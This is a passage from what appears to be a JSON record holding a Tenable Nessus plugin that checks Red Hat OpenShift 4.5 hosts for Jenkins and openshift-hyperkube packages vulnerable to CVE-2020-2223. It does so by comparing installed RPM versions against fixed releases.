script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-2223\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(79, 400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(7|8)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\npkgs = [\n {'reference':'jenkins-2.235.2.1597312414-1.el7', 'release':'7'},\n {'reference':'openshift-hyperkube-4.5.0-202008130146.p0.git.0.aaf1d57.el7', 'cpu':'s390x', 'release':'7'},\n {'reference':'openshift-hyperkube-4.5.0-202008130146.p0.git.0.aaf1d57.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'openshift-hyperkube-4.5.0-202008130146.p0.git.0.aaf1d57.el8', 'cpu':'s390x', 'release':'8'},\n {'reference':'openshift-hyperkube-4.5.0-202008130146.p0.git.0.aaf1d57.el8', 'cpu':'x86_64', 'release':'8'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / openshift-hyperkube');\n}\n\n\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}
